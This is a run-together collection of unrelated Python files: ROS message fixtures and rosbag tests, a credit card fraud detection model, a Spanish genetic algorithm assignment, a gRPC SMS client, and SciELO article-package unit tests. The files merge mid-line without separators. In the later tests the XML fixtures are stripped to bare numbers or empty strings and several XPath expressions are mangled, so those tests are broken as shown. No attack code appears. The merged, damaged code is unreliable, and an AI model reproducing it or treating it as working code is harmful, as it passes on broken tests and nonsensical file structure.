https://github.com/pgao/roscpp_core/commit/dffa31afe8d7f1268a3fa227408aeb6e04a28b87#diff-65b9485bd6b5d3fb4b7a84cd975c3967L157 return rospy.Time( secs=int(nanostamp / 1000000000), nsecs=int(nanostamp % 1000000000)) def to_ros_arr(arr): return arr.flatten(order='C').tolist() ############################################################################### ### ROS Message Generators def gen_transform(nanostamp): import tf from tf2_msgs.msg import TFMessage from geometry_msgs.msg import Transform from geometry_msgs.msg import TransformStamped tf_msg = TFMessage() tf_transform = TransformStamped() tf_transform.header.stamp = nanostamp_to_rostime(nanostamp) tf_transform.header.frame_id = 'src_frame' tf_transform.child_frame_id = 'child_frame' transform = Transform() r_4x4 = np.ones((4, 4)) q = tf.transformations.quaternion_from_matrix(r_4x4) transform.rotation.x = q[0] transform.rotation.y = q[1] transform.rotation.z = q[2] transform.rotation.w = q[3] transform.translation.x = 1 transform.translation.y = 2 transform.translation.z = 3 tf_transform.transform = transform tf_msg.transforms.append(tf_transform) return tf_msg def gen_camera_info(nanostamp): from sensor_msgs.msg import CameraInfo info = CameraInfo() info.header.frame_id = 'camera_frame' info.header.stamp = nanostamp_to_rostime(nanostamp) info.width = 100 info.height = 200 info.distortion_model = 'plumb_bob' K = np.ones((3, 3)) info.K = to_ros_arr(K) P = np.zeros((3, 4)) info.P = to_ros_arr(P) return info def gen_camera_image(nanostamp): import cv2 from cv_bridge import CvBridge bridge = CvBridge() # Create a fake image img = np.zeros((200, 100, 3), dtype=np.uint8) from PIL import Image p_img = Image.fromarray(img) from io import BytesIO with BytesIO() as output: p_img.save(output, 'PNG') img_bytes = bytearray(output.getvalue()) # Do a dance to get a CV Img, which has good interop with ROS img_arr = np.asarray(img_bytes, dtype=np.uint8) cv_img = cv2.imdecode(img_arr, cv2.IMREAD_UNCHANGED) ros_img_msg = bridge.cv2_to_imgmsg(cv_img, encoding='bgr8') ros_img_msg.header.frame_id = 'camera_frame' ros_img_msg.header.stamp = nanostamp_to_rostime(nanostamp) return ros_img_msg def gen_pcl_cloud(nanostamp): from sensor_msgs.msg import PointField 
from std_msgs.msg import Header import sensor_msgs.point_cloud2 as pcl2 header = Header() header.frame_id = 'pointsensor' header.stamp = nanostamp_to_rostime(nanostamp) points = np.zeros((10, 3), dtype=np.float32) fields = [PointField('x', 0, PointField.FLOAT32, 1), PointField('y', 4, PointField.FLOAT32, 1), PointField('z', 8, PointField.FLOAT32, 1)] pcl_msg = pcl2.create_cloud(header, fields, points) return pcl_msg def gen_ros_color(): """color in [0, 1] -> ROS color""" from std_msgs.msg import ColorRGBA r, g, b = (.5, .5, .5) ros_color = ColorRGBA() ros_color.r = r ros_color.g = g ros_color.b = b ros_color.a = 1. return ros_color def gen_marker(): from geometry_msgs.msg import Point from visualization_msgs.msg import Marker m = Marker() m.type = Marker.LINE_LIST # pairs of points create a line m.action = Marker.MODIFY # or add m.color = gen_ros_color() m.scale.x = 0.1 startp = Point() startp.x, startp.y, startp.z = (1, 2, 3) endp = Point() endp.x, endp.y, endp.z = (3, 4, 5) m.points += [startp, endp] return m def gen_marker_array(nanostamp): from visualization_msgs.msg import MarkerArray marray = MarkerArray() for obj_id in range(10): from std_msgs.msg import Header header = Header() header.frame_id = 'marker' header.stamp = nanostamp_to_rostime(nanostamp) markers = [gen_marker() for _ in range(10)] for mid, m in enumerate(markers): m.id = obj_id * 10 + mid m.ns = str(obj_id) m.header = header marray.markers += markers return marray # A container compatible with both ROSBag as well as ROS Publishers ROSMsgEntry = collections.namedtuple( 'ROSMsgEntry', ('topic', 'timestamp', 'msg')) def gen_msg_fixture(start_time_sec=1, end_time_sec=10): for t in np.arange(start_time_sec, end_time_sec + 1, 0.5): t_ns = int(t * 1e9) topic_to_msgs = { '/tf': [gen_transform(t_ns)], '/camera/camera_info': [gen_camera_info(t_ns)], '/camera/image_raw': [gen_camera_image(t_ns)], '/pointsensor/cloud': [gen_pcl_cloud(t_ns)], '/labels': [gen_marker_array(t_ns)], } for topic, msgs in topic_to_msgs.items(): for msg in msgs: yield ROSMsgEntry( topic=topic, timestamp=nanostamp_to_rostime(t_ns), msg=msg) ############################################################################### ### Tests def test_ros_msg_generation(): msgs = list(gen_msg_fixture(start_time_sec=1, end_time_sec=2)) assert len(msgs) == 20 EXPECTED_BAGINFO = """ path: /tmp/psegs_test_rospy.bag version: 2.0 duration: 9.5s start: Jan 01 1970 00:00:01.00 (1.00) end: Jan 01 1970 00:00:10.50 (10.50) size: 1.6 MB messages: 100 compression: none [3/3 chunks] types: sensor_msgs/CameraInfo [c9a58c1b0b154e0e6da7578cb991d214] sensor_msgs/Image [060021388200f6f0f447d0fcd9c64743] sensor_msgs/PointCloud2 [1158d486dd51d683ce2f1be655c3c181] tf2_msgs/TFMessage [94810edda583a504dfda3829e70d7eec] visualization_msgs/MarkerArray [d155b9ce5188fbaf89745847fd5882d7] topics: /camera/camera_info 20 msgs @ 2.0 Hz : sensor_msgs/CameraInfo /camera/image_raw 20 msgs @ 2.0 Hz : sensor_msgs/Image /labels 20 msgs @ 2.0 Hz : visualization_msgs/MarkerArray /pointsensor/cloud 20 msgs @ 2.0 Hz : sensor_msgs/PointCloud2 /tf 20 msgs @ 2.0 Hz : tf2_msgs/TFMessage """ def test_rosbag_io(): BAG_PATH = '/tmp/psegs_test_rospy.bag' n = 0 import rosbag with rosbag.Bag(BAG_PATH, mode='w') as bw: for rme in gen_msg_fixture(start_time_sec=1, end_time_sec=10): bw.write(rme.topic, rme.msg, t=rme.timestamp) n += 1 assert n == 100 with rosbag.Bag(BAG_PATH, mode='r') as br: assert str(br).strip() == EXPECTED_BAGINFO.strip() Credit Card Fraud Detection/model.py import warnings 
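# Script outline: load creditcard.csv, visualize the Class imbalance, rebalance
# a copy of the data with SMOTE for comparison plots, split into train/test
# sets, then fit a soft-voting ensemble (LogisticRegression,
# RandomForestClassifier, DecisionTreeClassifier), pickle it, and print the
# ROC AUC, classification report and confusion matrix.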
warnings.filterwarnings('ignore') warnings.simplefilter('ignore') import pandas as pd import matplotlib.pyplot as plt from matplotlib.patches import Rectangle import numpy as np from pprint import pprint as pp import csv from pathlib import Path from imblearn.over_sampling import SMOTE from imblearn.pipeline import Pipeline from sklearn.linear_model import LinearRegression, LogisticRegression from sklearn.model_selection import train_test_split, GridSearchCV from sklearn.tree import DecisionTreeClassifier from sklearn.metrics import r2_score, classification_report, confusion_matrix, accuracy_score, roc_auc_score, roc_curve, precision_recall_curve, average_precision_score from sklearn.metrics import homogeneity_score, silhouette_score from sklearn.ensemble import RandomForestClassifier, VotingClassifier import seaborn as sns import pickle import pandas as pd df = pd.read_csv("creditcard.csv") # print(df.head()) #print(df.info()) # Visualizing The Target feature plt.figure(figsize=(10,6)) g = sns.countplot(df['Class']) g.set_xticklabels(['Not Fraud','Fraud']) plt.show() # Count the occurrences of fraud and no fraud and print them occ = df['Class'].value_counts() # print(occ) # Print the ratio of fraud cases ratio_cases = occ/len(df.index) # print(f'Ratio of fraudulent cases: {ratio_cases[1]}\nRatio of non-fraudulent cases: {ratio_cases[0]}') def prep_data(df: pd.DataFrame): """ Convert the DataFrame into two variable X: data columns (V1 - V28) y: lable column """ X = df.iloc[:, :30].values y = df.Class.values return X, y # Define a function to create a scatter plot of our data and labels def plot_data(X: np.ndarray, y: np.ndarray): plt.scatter(X[y == 0, 0], X[y == 0, 1], label="Class #0", alpha=0.5, linewidth=0.15) plt.scatter(X[y == 1, 0], X[y == 1, 1], label="Class #1", alpha=0.5, linewidth=0.15, c='r') plt.legend() return plt.show() # Create X and y from the prep_data function X, y = prep_data(df) # Plot our data by running our plot data function on X and y plot_data(X, y) plt.scatter(df.V2[df.Class == 0], df.V3[df.Class == 0], label="Class #0", alpha=0.5, linewidth=0.15) plt.scatter(df.V2[df.Class == 1], df.V3[df.Class == 1], label="Class #1", alpha=0.5, linewidth=0.15, c='r') plt.legend() plt.show() # Run the prep_data function X, y = prep_data(df) print(f'X shape: {X.shape}\ny shape: {y.shape}') # Define the resampling method method = SMOTE() # Create the resampled feature set X_resampled, y_resampled = method.fit_resample(X, y) # Plot the resampled data plot_data(X_resampled, y_resampled) pd.value_counts(pd.Series(y)) pd.value_counts(pd.Series(y_resampled)) def compare_plot(X: np.ndarray, y: np.ndarray, X_resampled: np.ndarray, y_resampled: np.ndarray, method: str): plt.subplot(1, 2, 1) plt.scatter(X[y == 0, 0], X[y == 0, 1], label="Class #0", alpha=0.5, linewidth=0.15) plt.scatter(X[y == 1, 0], X[y == 1, 1], label="Class #1", alpha=0.5, linewidth=0.15, c='r') plt.title('Original Set') plt.subplot(1, 2, 2) plt.scatter(X_resampled[y_resampled == 0, 0], X_resampled[y_resampled == 0, 1], label="Class #0", alpha=0.5, linewidth=0.15) plt.scatter(X_resampled[y_resampled == 1, 0], X_resampled[y_resampled == 1, 1], label="Class #1", alpha=0.5, linewidth=0.15, c='r') plt.title(method) plt.legend() plt.show() compare_plot(X, y, X_resampled, y_resampled, method='SMOTE') # Split your data into training and test set X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3, random_state=0) def get_model_results(X_train: np.ndarray, y_train: np.ndarray, X_test: np.ndarray, y_test: 
np.ndarray, model): """ model: sklearn model (e.g. RandomForestClassifier) """ # Fit your training model to your training set model.fit(X_train, y_train) # dumping model into pickel file with open('model_pickle','wb') as f: pickle.dump(model,f) # Obtain the predicted values and probabilities from the model predicted = model.predict(X_test) try: probs = model.predict_proba(X_test) print('ROC Score:') print(roc_auc_score(y_test, probs[:,1])) except AttributeError: pass # Print the ROC curve, classification report and confusion matrix print('\nClassification Report:') print(classification_report(y_test, predicted)) print('\nConfusion Matrix:') print(confusion_matrix(y_test, predicted)) return predicted # Define the three classifiers to use in the ensemble clf1 = LogisticRegression(class_weight={0:1, 1:15}, random_state=5, solver='liblinear') clf2 = RandomForestClassifier(class_weight={0:1, 1:12}, criterion='gini', max_depth=8, max_features='log2', min_samples_leaf=10, n_estimators=30, n_jobs=-1, random_state=5) clf3 = DecisionTreeClassifier(random_state=5, class_weight="balanced") # Combine the classifiers in the ensemble model # ensemble_model = VotingClassifier(estimators=[('lr', clf1), ('rf', clf2), ('dt', clf3)], voting='hard') # Get the results # get_model_results(X_train, y_train, X_test, y_test, ensemble_model) # Define the ensemble model ensemble_model = VotingClassifier(estimators=[('lr', clf1), ('rf', clf2), ('gnb', clf3)], voting='soft', weights=[1, 4, 1], flatten_transform=True) # Get results get_model_results(X_train, y_train, X_test, y_test, ensemble_model) 0 ''' * Autores: - , C.I: 24.423.188 - , C.I: 25.582.661 * Electiva: Introduccion a la IA * Profesor: ''' # Modulos from random import random from math import sin, fabs, ceil, log10 # Desarrollo de funciones def float_to_bin(x, n_bits): ''' Retorna el equivalente en binario de x ''' binary = bin(int(str(x).split('.')[1])).lstrip('0b') n = len(binary) if n < n_bits: binary = ('0' * (n_bits - n)) + binary return binary def create_population(n, n_bits): ''' Genera una poblacion de N individuos unicos ''' population = [] i = 0 while i < n: x = random() try: population.index(x) continue except: x = round(x, 7) population.append({'x': x, 'binary': float_to_bin(x, n_bits)}) i += 1 return population def evaluate(population): ''' Agrega el valor de la adaptacion a cada individuo de la poblacion ''' for individual in population: individual['fadap'] = scientific_notation(round(float(individual['x']) + fabs(sin(32 * float(individual['x']))), 7)) def add_adaptations(population): ''' Retorna la suma de todas las adaptaciones de los individuos que forman la poblacion de entrada ''' add = 0 for individual in population: add += float(individual['fadap']) return add def show_progress(population, cases, generation = 0): ''' Muestra la estadistica de la generacion actual''' file = 'out' + str(cases) + '.txt' out = open(file, "a") if generation: out.write('\n') out.write('GENERACION ACTUAL: {}\n'.format(generation)) out.write('Mejor adaptacion: {}, Adaptacion promedio: {}\n\n'.format(population[0].get('fadap'), round(add_adaptations(population) / len(population), 7))) out.write('No\tCromosoma\t\t\t\t\tValor real\t\tAdaptacion\n') i = 0 for individual in population: if i < 11 or i >= 91: out.write('{}\t{}\t{}\t\t{}\n'.format((i + 1), individual['binary'], individual['x'], individual['fadap'])) if i == 11: out.write('...\t\t\t\t\t\t\t\t\t\t\t...\n'.format((i + 1), individual['binary'], individual['x'], individual['fadap'])) i += 1 out.close() def 
selection_probability(population): ''' Agrega el valor de la probabilidad de seleccion a cada individuo de la poblacion ''' t = add_adaptations(population) for individual in population: individual['prob'] = float(individual['fadap']) / t def search(search_space, elem): ''' Retorna el indice donde se encuentre elem ''' i = 0 n = len(search_space) found = False while i < n and not found: if elem <= search_space[i]: found = True else: i += 1 return i def roulette_wheel(population): ''' Retorna dos individuos aleatorios ''' roulette = [] for individual in population: if roulette == []: elem = individual['prob'] else: elem = individual['prob'] + roulette[-1] roulette.append(elem) while True: p1 = search(roulette, random()) p2 = search(roulette, random()) if p1 != p2: break return p1, p2 def encode(num, n_bits): ''' Dado un numero real, obtiene su correspondiente numero entero ''' return ceil(num * (2 ** n_bits - 1)) def decoding(num, n_bits): ''' Dado un numero entero, obtiene su correspondiente numero real ''' return round(1 / (num / (2 ** n_bits - 1)), 7) def scientific_notation(num): ''' Convierte el numero real de formato x.xxe-0x a 0.0000xxx ''' if (str(num).find('e') != -1): num = format(float(num), '.7f') return num def modification_point(prob, n_bits): ''' Retorna el punto de modificacion de bits para el cruce y la mutacion ''' while True: i = 1 found = False while i <= n_bits and not found: if round(random(), 7) <= prob: found = True else: i += 1 if i <= n_bits: break return i def crossing(parent1, parent2, pc, n_bits): ''' Retorna 2 hijos de dos individuos ''' parent1 = encode(parent1, n_bits) parent2 = encode(parent2, n_bits) while True: point = modification_point(pc, n_bits) h1 = (parent1 >> point) | (parent2 << point) h2 = (parent1 << point) | (parent2 >> point) h1 = decoding(h1, n_bits) h2 = decoding(h2, n_bits) if 0 <= h1 <= 1 and 0 <= h2 <= 1 and h1 != h2: break h1, h2 = scientific_notation(h1), scientific_notation(h2) return h1, h2 def mutation(p1, p2, pm, n_bits): ''' Retorna la mutacion de p1 y p2 ''' binary_h1 = float_to_bin(p1, n_bits) binary_h2 = float_to_bin(p2, n_bits) while True: point = modification_point(pm, n_bits) if binary_h1[point - 1] == '0': h1 = encode(p1, n_bits) | 1 << point else: h1 = encode(p1, n_bits) ^ 1 << point if binary_h2[point - 1] == '0': h2 = encode(p2, n_bits) | 1 << point else: h2 = encode(p2, n_bits) ^ 1 << point h1, h2 = decoding(h1, n_bits), decoding(h2, n_bits) if 0 <= h1 <= 1 and 0 <= h2 <= 1 and h1 != h2: break h1, h2 = scientific_notation(h1), scientific_notation(h2) return h1, h2 def main(): ''' Cuerpo principal ''' # Entrada try: input = open("in.txt", "r") except: raise 'Error, no se encontro el archivo in.txt' # Procesos cases = 0 n_bits = ceil(log10(10 ** 7) / log10(2)) for line in input: cases += 1 test = line.split(' ') n = int(test[0]) pc = float(test[1]) pm = float(test[2]) generations = int(test[3]) gap = int(test[4]) # Inicializar la poblacion cont_new_individuals = ceil(n * gap / 100) population = create_population(n, n_bits) evaluate(population) # Ordenando en forma decreciente population.sort(key = lambda individual: float(individual['fadap']), reverse = True) # Mostrar avances show_progress(population, cases) # Recorriendo las generaciones for t in range(generations): # Inicializando la nueva poblacion descendants = [{'x': population[i]['x']} for i in range(0, n - cont_new_individuals)] # Generando probabilidades de seleccion selection_probability(population) # Creando los nuevos individuos i = 0 while i < 
cont_new_individuals: # Seleccionando los padres p1, p2 = roulette_wheel(population) elements = False # Cruce if round(random(), 7) < pc: elements = True h1, h2 = crossing(population[p1]['x'], population[p2]['x'], pc, n_bits) else: # Mutacion if round(random(),7) < pm: elements = True h1, h2 = mutation(population[p1]['x'], population[p2]['x'], pm, n_bits) # Aagregando a los nuevos individuos if elements: try: descendants.index(h1) except: descendants.append({'x': h1}) i += 1 try: descendants.index(h2) except: if i < cont_new_individuals: # Agrego los dos hijos descendants.append({'x': h2}) i += 1 else: continue # Creando el equivalente en binario para cada individuo de los descendientes for individual in descendants: individual['binary'] = float_to_bin(individual['x'], n_bits) # Evaluando la poblacion descendiente evaluate(descendants) # Ordenando la poblacion descendientes en forma decreciente descendants.sort(key = lambda individual: float(individual['fadap']), reverse = True) # Mostrar avances show_progress(descendants, cases, t + 1) population = descendants[:] descendants.clear() population.clear() # Salida input.close if __name__ == '__main__': main()import grpc from environs import Env from .stub import sms_pb2 from .stub import sms_pb2_grpc env = Env() env.read_env() JARVIS_HOST = env.str('JARVIS_HOST', default='localhost') JARVIS_PORT = env.int('JARVIS_PORT', default=54321) JARVIS_SERVER = f'{JARVIS_HOST}:{JARVIS_PORT}' def sms_admin(message, app=None): with grpc.insecure_channel(JARVIS_SERVER) as channel: stub = sms_pb2_grpc.SMSStub(channel) response = stub.SMSAdmin(sms_pb2.AuAdminSMSRequest(message=message, app=app)) return response.success,response.detail def sms_au(mobile_number, message, app=None): with grpc.insecure_channel(JARVIS_SERVER) as channel: stub = sms_pb2_grpc.SMSStub(channel) response = stub.SMSAu(sms_pb2.AuSMSRequest(mobile_number=mobile_number, message=message, app=app)) return response.success, response.detail def sms_aliyun(business_id, mobile_numbers, template_code, template_param, app=None): with grpc.insecure_channel(JARVIS_SERVER) as channel: stub = sms_pb2_grpc.SMSStub(channel) response = stub.SMSAliyun( sms_pb2.AliyunSMSRequest(business_id=business_id, mobile_numbers=mobile_numbers, template_code=template_code, template_param=template_param, app=app)) return response.success, response.detail import unittest from unittest import mock from lxml import etree from . import utils from documentstore_migracao.export.sps_package import ( parse_value, parse_issue, SPS_Package, NotAllowedtoChangeAttributeValueError, InvalidAttributeValueError, InvalidValueForOrderError, is_valid_value_for_order, is_valid_value_for_issns, SourceJson, ) def pubdate_xml(year, month, day): LABELS = ["year", "month", "day"] values = [year, month, day] xml = "".join( [ ("<{}>".format(label) + str(values[n]) + "".format(label)) for n, label in enumerate(LABELS) ] ) return """{}""".format(xml) def sps_package(article_meta_xml, doi="10.1590/S0074-02761962000200006"): xml = utils.build_xml(article_meta_xml, doi) xmltree = etree.fromstring(xml) return SPS_Package(xmltree, "a01") class Test_MatchPubDate1(unittest.TestCase): def setUp(self): self.xml = """
2010513 201223
""" xmltree = etree.fromstring(self.xml) self.sps_package = SPS_Package(xmltree, None) def test__match_pubdate(self): result = self.sps_package._match_pubdate( ('pub-date[@date-type="pub"]', 'pub-date[@date-type="collection"]') ) self.assertEqual(result.findtext("year"), "2010") def test_document_pubdate(self): self.assertEqual(self.sps_package.document_pubdate, ("2010", "05", "13")) def test_documents_bundle_pubdate(self): self.assertEqual( self.sps_package.documents_bundle_pubdate, ("2012", "02", "03") ) def test_transform_pubdate(self): self.sps_package.transform_pubdate() xpaths_results = ( ('="pub"]', ("2010", "5", "13")), ('="collection"]', ("2012", "2", "3")), ) for xpath, result in xpaths_results: with self.subTest(xpath=xpath, result=result): pubdate = self.sps_package.article_meta.find(xpath) self.assertIsNotNone(pubdate) self.assertEqual(pubdate.get("publication-format"), "electronic") self.assertEqual(pubdate.findtext("year"), result[0]) self.assertEqual(pubdate.findtext("month"), result[1]) self.assertEqual(pubdate.findtext("day"), result[2]) class Test_MatchPubDate1_Season(unittest.TestCase): def setUp(self): xml = """
2010513 2012Jan-Feb
""" xmltree = etree.fromstring(xml) self.sps_package = SPS_Package(xmltree, None) def test__match_pubdate(self): result = self.sps_package._match_pubdate( ('[@="pub"]', 'pub-[@="collection"]') ) self.assertEqual(result.findtext("year"), "2010") def test_document_pubdate(self): self.assertEqual(self.sps_package.document_pubdate, ("2010", "05", "13")) def test_documents_bundle_pubdate(self): self.assertEqual(self.sps_package.documents_bundle_pubdate, ("2012", "", "")) def test_transform_pubdate(self): self.sps_package.transform_pubdate() pubdate = self.sps_package.article_meta.find('pub-date[@date-type="pub"]') self.assertIsNotNone(pubdate) self.assertEqual(pubdate.get("publication-format"), "electronic") self.assertEqual(pubdate.findtext("year"), "2010") self.assertEqual(pubdate.findtext("month"), "5") self.assertEqual(pubdate.findtext("day"), "13") pubdate = self.sps_package.article_meta.find( 'pub-date[@date-type="collection"]' ) self.assertIsNotNone(pubdate) self.assertEqual(pubdate.get("publication-format"), "electronic") self.assertEqual(pubdate.findtext("year"), "2012") self.assertEqual(pubdate.findtext("season"), "Jan-Feb") class Test_MatchPubDate2(unittest.TestCase): def setUp(self): xml = """
201041 2012
""" xmltree = etree.fromstring(xml) self.sps_package = SPS_Package(xmltree, None) def test__match_pubdate(self): result = self.sps_package._match_pubdate( ('pub-date[@pub-type="epub"]', 'pub-date[@pub-type="collection"]') ) self.assertEqual(result.findtext("year"), "2010") def test_document_pubdate(self): self.assertEqual(self.sps_package.document_pubdate, ("2010", "04", "01")) def test_documents_bundle_pubdate(self): self.assertEqual(self.sps_package.documents_bundle_pubdate, ("2012", "", "")) def test_transform_pubdate(self): self.sps_package.transform_pubdate() xpaths_results = ( ('[@="pub"]', ("2010", "4", "1")), ('pub-[@="collection"]', ("2012", None, None)), ) for xpath, result in xpaths_results: with self.subTest(xpath=xpath, result=result): pubdate = self.sps_package.article_meta.find(xpath) self.assertIsNotNone(pubdate) self.assertIsNone(pubdate.attrib.get("pub-type")) self.assertEqual(pubdate.get("publication-format"), "electronic") self.assertEqual(pubdate.findtext("year"), result[0]) self.assertEqual(pubdate.findtext("month"), result[1]) self.assertEqual(pubdate.findtext("day"), result[2]) class Test_MatchPubDate3(unittest.TestCase): def setUp(self): xml = """
2010910 2011
""" xmltree = etree.fromstring(xml) self.sps_package = SPS_Package(xmltree, None) def test__match_pubdate(self): result = self.sps_package._match_pubdate( ('pub-date[@="collection"]', 'pub-[@="epub-ppub"]') ) self.assertEqual(result.findtext("year"), "2011") def test_document_pubdate(self): self.assertEqual(self.sps_package.document_pubdate, ("2010", "09", "10")) def test_documents_bundle_pubdate(self): self.assertEqual(self.sps_package.documents_bundle_pubdate, ("2011", "", "")) def test_transform_pubdate(self): self.sps_package.transform_pubdate() xpaths_results = ( ('pub-[@="pub"]', ("2010", "9", "10")), ('pub-[@="collection"]', ("2011", None, None)), ) for xpath, result in xpaths_results: with self.subTest(xpath=xpath, result=result): pubdate = self.sps_package.article_meta.find(xpath) self.assertIsNotNone(pubdate) self.assertIsNone(pubdate.attrib.get("pub-type")) self.assertEqual(pubdate.get("publication-format"), "electronic") self.assertEqual(pubdate.findtext("year"), result[0]) self.assertEqual(pubdate.findtext("month"), result[1]) self.assertEqual(pubdate.findtext("day"), result[2]) class Test_MatchPubDate4(unittest.TestCase): def setUp(self): xml = """
201091 2011 20122
""" xmltree = etree.fromstring(xml) self.sps_package = SPS_Package(xmltree, None) def test__match_pubdate(self): result = self.sps_package._match_pubdate( ('pub-date[@="pub"]', 'pub-date[@date-type="collection"]') ) self.assertEqual(result.findtext("year"), "2010") def test_document_pubdate(self): self.assertEqual(self.sps_package.document_pubdate, ("2010", "09", "01")) def test_documents_bundle_pubdate(self): self.assertEqual(self.sps_package.documents_bundle_pubdate, ("2012", "02", "")) def test_transform_pubdate(self): self.sps_package.transform_pubdate() xpaths_results = ( ('pub-date[@date-type="pub"]', ("2010", "9", "1")), ('pub-date[@="collection"]', ("2012", "2", None)), ) for xpath, result in xpaths_results: with self.subTest(xpath=xpath, result=result): pubdate = self.sps_package.article_meta.find(xpath) self.assertIsNotNone(pubdate) self.assertEqual(pubdate.get("publication-format"), "electronic") self.assertEqual(pubdate.findtext("year"), result[0]) self.assertEqual(pubdate.findtext("month"), result[1]) self.assertEqual(pubdate.findtext("day"), result[2]) class Test_SPS_package(unittest.TestCase): def test_parse_value_num(self): self.assertEqual(parse_value("3"), "03") def test_parse_value_num_spe(self): self.assertEqual(parse_value("Especial"), "spe") def test_parse_value_suppl(self): self.assertEqual(parse_value("Supplement"), "s") def test_parse_issue_num_suppl(self): self.assertEqual(parse_issue("3 Supl"), "03-s0") def test_parse_issue_num_spe_(self): self.assertEqual(parse_issue("4 Especial"), "04-spe") def test_parse_issue_num_suppl_label(self): self.assertEqual(parse_issue("3 Supl A"), "03-sa") def test_parse_issue_num_spe_num(self): self.assertEqual(parse_issue("4 Especial 1"), "04-spe01") def test_parse_issue_suppl_label(self): self.assertEqual(parse_issue("Supl A"), "sa") def test_parse_issue_spe_num(self): self.assertEqual(parse_issue("Especial 1"), "spe01") class Test_SPS_Package(unittest.TestCase): def setUp(self): article_xml = """ """ self.sps_package = SPS_Package(etree.fromstring(article_xml), "a01") def test_elements_which_has_xlink_href(self): items = list(self.sps_package.elements_which_has_xlink_href) self.assertEqual(len(items), 7) self.assertEqual( [node.tag for node in items], sorted( [ "inline-graphic", "graphic", "ext-link", "ext-link", "inline-supplementary-material", "supplementary-material", "media", ] ), ) def test_replace_assets(self): expected = [ ("a01tab02.gif", "a01-gtab02"), ("a01f01.gif", "a01-gf01"), ("a01tab01.gif", "a01-gtab01"), ("a01tab03.gif", "a01-gtab03"), ("a01tab04.gif", "a01-gtab04"), ("a01tab04.gif", "a01-gtab04"), ] items = self.sps_package.replace_assets_names() self.assertEqual(len(items), 6) for i, item in enumerate(items): with self.subTest(i): self.assertEqual(expected[i][0], item[0]) self.assertEqual(expected[i][1], item[1]) def test_get_renditions_metadata_no_renditions(self): renditions, renditions_metadata = self.sps_package.get_renditions_metadata() self.assertEqual(renditions, []) self.assertEqual(renditions_metadata, {}) def test_get_renditions_metadata(self): article_xml = """ Texto completo somente em PDF (EN) Texto completo somente em PDF (PT) """ self.sps_package = SPS_Package(etree.fromstring(article_xml), "a01") renditions, renditions_metadata = self.sps_package.get_renditions_metadata() self.assertEqual( renditions, [ ('http://www.scielo.br/pdf/aa/v1n1/a01.pdf', 'a01'), ('http://www.scielo.br/pdf/aa/v1n1/pt_a01.pdf', 'pt_a01'), ] ) self.assertEqual( renditions_metadata, { 'en': 
'http://www.scielo.br/pdf/aa/v1n1/a01.pdf', 'pt': 'http://www.scielo.br/pdf/aa/v1n1/pt_a01.pdf', } ) class Test_SPS_Package_No_Metadata(unittest.TestCase): def setUp(self): article_xml = """ """ self.sps_package = SPS_Package(etree.fromstring(article_xml), "a01") def test_parse_article(self): self.assertEqual(self.sps_package.parse_article_meta, []) def test_package_name(self): self.assertEqual(self.sps_package.package_name, "a01") def test_asset_package_name_f01(self): self.assertEqual(self.sps_package.asset_name("a01f01.jpg"), "a01-gf01.jpg") def test_asset_package_name_any_img(self): self.assertEqual(self.sps_package.asset_name("img.jpg"), "a01-gimg.jpg") def test_journal_meta(self): self.assertEqual(self.sps_package.journal_meta, []) def test_parse_article_meta(self): self.assertEqual(self.sps_package.parse_article_meta, []) class Test_SPS_Package_VolNumFpageLpage(unittest.TestCase): def setUp(self): article_meta_xml = """volume 5 fpage lpage """ self.sps_package = sps_package(article_meta_xml) def test_parse_article_meta_vol_num_fpage(self): self.assertEqual( self.sps_package.parse_article_meta, [ ("volume", "volume"), ("issue", "05"), ("fpage", "fpage"), ("lpage", "lpage"), ("year", "2010"), ("doi", "S0074-02761962000200006"), ("publisher-id", "S0074-02761962000200006"), ("other", "00006"), ], ) def test_supplement(self): self.assertEqual(self.sps_package.supplement, None) def test_number(self): self.assertEqual(self.sps_package.number, "5") def test_package_name_vol_num_fpage(self): self.assertEqual( self.sps_package.package_name, "1234-5678-acron-volume-05-fpage-lpage" ) def test_asset_package_name_f01(self): self.assertEqual( self.sps_package.asset_name("a01f01.jpg"), "1234-5678-acron-volume-05-fpage-lpage-gf01.jpg", ) def test_asset_package_name_any_img(self): self.assertEqual( self.sps_package.asset_name("img.jpg"), "1234-5678-acron-volume-05-fpage-lpage-gimg.jpg", ) def test_journal_meta(self): self.assertEqual( self.sps_package.journal_meta, [ ("eissn", "1234-5678"), ("pissn", "0123-4567"), ("issn", "1234-5678"), ("acron", "acron"), ], ) def test_is_only_online_publication(self): self.assertEqual(self.sps_package.is_only_online_publication, False) def test_is_ahead_of_print_false(self): self.assertFalse(self.sps_package.is_ahead_of_print) class Test_SPS_Package_FirstVolNumFpageLpageIssue(unittest.TestCase): def setUp(self): """ Cria um XML com o items repetidos no nó ``article-meta``. 
""" article_meta_xml = """26 4 1393 1395 EVIDÊNCIAS científicas em homeopatia Revista de Homeopatia São Paulo 80 1-2 supl 1 122 Dossiê especial 2017 """ self.sps_package = sps_package(article_meta_xml) def test_parse_article_get_first_volume(self): """ Testa se a propriedade ``parse_article_meta`` garante que seja retornada sempre o ``volume`` do nó ``article-meta`` """ self.assertEqual( self.sps_package.parse_article_meta, [ ("volume", "26"), ("issue", "04"), ("fpage", "1393"), ("lpage", "1395"), ("year", "2010"), ("doi", "S0074-02761962000200006"), ("publisher-id", "S0074-02761962000200006"), ("other", "00006"), ], ) def test_parse_article_get_first_lpage(self): """ Testa se a propriedade ``parse_article_meta`` garante que seja retornada sempre o ``lpage`` do nó ``article-meta`` """ self.assertEqual( self.sps_package.parse_article_meta, [ ("volume", "26"), ("issue", "04"), ("fpage", "1393"), ("lpage", "1395"), ("year", "2010"), ("doi", "S0074-02761962000200006"), ("publisher-id", "S0074-02761962000200006"), ("other", "00006"), ], ) def test_parse_article_get_first_fpage(self): """ Testa se a propriedade ``parse_article_meta`` garante que seja retornada sempre o ``fpage`` do nó ``article-meta`` """ self.assertEqual( self.sps_package.parse_article_meta, [ ("volume", "26"), ("issue", "04"), ("fpage", "1393"), ("lpage", "1395"), ("year", "2010"), ("doi", "S0074-02761962000200006"), ("publisher-id", "S0074-02761962000200006"), ("other", "00006"), ], ) def test_parse_article_get_first_issue(self): """ Testa se a propriedade ``parse_article_meta`` garante que seja retornada sempre o ``issue`` do nó ``article-meta`` """ self.assertEqual( self.sps_package.parse_article_meta, [ ("volume", "26"), ("issue", "04"), ("fpage", "1393"), ("lpage", "1395"), ("year", "2010"), ("doi", "S0074-02761962000200006"), ("publisher-id", "S0074-02761962000200006"), ("other", "00006"), ], ) class Test_SPS_Package_VolFpageLpage(unittest.TestCase): def setUp(self): article_meta_xml = """volume fpage lpage """ 